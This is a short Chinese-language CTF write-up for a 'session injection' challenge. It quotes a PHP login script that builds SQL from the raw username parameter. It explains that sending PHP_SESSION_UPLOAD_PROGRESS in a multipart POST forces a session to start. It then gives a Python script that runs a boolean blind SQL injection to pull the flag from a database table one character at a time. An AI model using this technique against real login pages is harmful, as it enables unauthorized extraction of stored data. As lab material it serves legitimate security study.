session注入
源码
<?php!isset($_SESSION) AND die("Direct access on this script is not allowed!");include 'db.php';$sql = 'SELECT `username`,`password` FROM `ptbctf`.`ptbctf` where `username`="' . $_GET['username'] . '" and password="' . md5($_GET['password']) . '";';$result = $con->query($sql);function auth($user){$_SESSION['username'] = $user;return True;}($result->num_rows > 0 AND $row = $result->fetch_assoc() AND $con->close() AND auth($row['username']) AND die('<meta http-equiv="refresh" content="0; url=?p=home" />')) OR ($con->close() AND die('Try again!'));?>
在php.ini中设置session.auto_start=On,那么PHP每次处理PHP文件的时候都会自动执行session_start(),但是session.auto_start默认为Off。与Session相关的另一个叫session.upload_progress.enabled,默认为On,在这个选项被打开的前提下我们在multipart POST的时候传入PHP_SESSION_UPLOAD_PROGRESS,PHP会执行session_start()
session可控,可以构造在username内里面注入
import requests
url='http://e3ebe013-7cb3-4006-8d52-3aa8378449ea.node3.buuoj.cn/templates/login.php'
files={"file":"123"}
data={"PHP_SESSION_UPLOAD_PROGRESS":"123"}
cookies={"PHPSESSID":"123"}
for b in range(1,50):
for i in range(30,130):
params={"username":'test" or (ascii(substr((select group_concat(secret) from flag_tbl),'+str(b)+',1))='+str(i)+')#',
"password":"test"}
a=requests.post(url=url,files=files,data=data,cookies=cookies,params=params).text
if 'meta' in a:
print(chr(i))
break
若有收获,就点个赞吧
0 人点赞
